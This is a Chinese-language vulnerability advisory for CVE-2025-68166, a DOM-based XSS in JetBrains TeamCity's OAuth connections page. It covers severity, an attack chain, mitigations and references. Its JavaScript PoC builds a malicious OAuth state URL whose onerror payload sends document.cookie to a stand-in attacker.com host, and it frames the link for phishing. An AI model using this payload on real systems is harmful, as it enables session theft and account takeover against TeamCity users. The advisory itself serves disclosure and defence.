CVE-2025-68166: JetBrains TeamCity OAuth页面DOM型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-68166

漏洞类型

DOM型跨站脚本(XSS)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

JetBrains TeamCity

漏洞概述

CVE-2025-68166是JetBrains TeamCity中的一个DOM型跨站脚本(XSS)漏洞。该漏洞存在于TeamCity的OAuth连接配置页面，攻击者可以通过在OAuth连接标签页中注入恶意JavaScript代码。当目标用户访问包含恶意脚本的页面时，脚本将在用户浏览器上下文中执行，可能导致会话劫持、敏感信息窃取或进一步的攻击。由于该漏洞利用需要用户交互，攻击者通常需要诱导用户访问恶意构造的链接或页面。此漏洞影响2025.11之前的所有TeamCity版本，CVSS评分为5.4，属于中等严重程度。攻击向量为网络层面，无需认证即可发起攻击，但需要用户交互才能成功利用。

技术细节

DOM型XSS漏洞发生在客户端JavaScript处理用户输入时，未正确对数据进行安全编码或验证。在TeamCity的OAuth连接标签页中，当用户访问特定的OAuth配置URL时，应用程序会将URL参数或OAuth响应数据直接插入到DOM中，而未经过适当的HTML转义处理。攻击者可以通过构造包含恶意JavaScript代码的URL参数（如在redirect_uri或state参数中嵌入<script>标签或事件处理器如onerror/onload），当受害者访问该链接时，恶意代码将在其浏览器中执行。由于DOM型XSS完全在客户端发生，传统的服务器端WAF可能无法检测到此类攻击。攻击者利用此漏洞可以窃取用户会话Cookie、模拟用户操作或进行进一步的内网渗透。

攻击链分析

STEP 1

步骤1

攻击者识别目标TeamCity服务器版本，确认版本低于2025.11

STEP 2

步骤2

攻击者构造包含恶意JavaScript代码的OAuth URL参数（如state或redirect_uri）

STEP 3

步骤3

攻击者通过钓鱼邮件、恶意网站或社交工程手段诱导目标用户点击构造的恶意链接

STEP 4

步骤4

用户点击链接后，TeamCity OAuth页面将未过滤的用户输入插入到DOM中

STEP 5

步骤5

恶意JavaScript代码在用户浏览器上下文中执行，窃取会话Cookie或执行其他恶意操作

STEP 6

步骤6

攻击者利用窃取的会话信息劫持用户账户或进行进一步的内网攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-68166 DOM-based XSS PoC for JetBrains TeamCity
// Target: OAuth connections tab in TeamCity < 2025.11

const targetUrl = 'https://[TEAMCITY_HOST]/oauth/connections';

// Malicious payload - XSS via OAuth state parameter
const maliciousPayload = '<img src=x onerror="fetch(\'https://attacker.com/steal?cookie=\'+document.cookie)">"';

// Construct the malicious URL
const maliciousUrl = `${targetUrl}?state=${encodeURIComponent(maliciousPayload)}&connection=google`;

console.log('[+] CVE-2025-68166 - JetBrains TeamCity DOM-based XSS');
console.log('[+] Target:', targetUrl);
console.log('[+] Malicious URL:', maliciousUrl);
console.log('[+] Payload:', maliciousPayload);

// Social engineering component - create a convincing link
const phishingLink = `
[+] Attack Flow:
1. Attacker crafts malicious OAuth link with XSS payload
2. Victim is tricked into clicking the link
3. Malicious script executes in victim's browser
4. Attacker steals session cookies or performs actions as victim
`;

console.log(phishingLink);

影响范围

JetBrains TeamCity < 2025.11

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1)限制OAuth连接功能的使用，仅允许受信任的OAuth提供商；2)配置Web应用防火墙规则拦截包含XSS特征的请求；3)加强对用户访问OAuth页面的日志监控，及时发现异常访问行为；4)对TeamCity管理员进行安全意识培训，警惕可疑的OAuth链接；5)考虑临时禁用OAuth认证功能，改用传统的用户名密码认证。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-68166
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-68166
3 Details https://www.cvedetails.com/cve/CVE-2025-68166/
4 VulDB https://vuldb.com/cve/CVE-2025-68166
5 Link https://www.jetbrains.com/privacy-security/issues-fixed/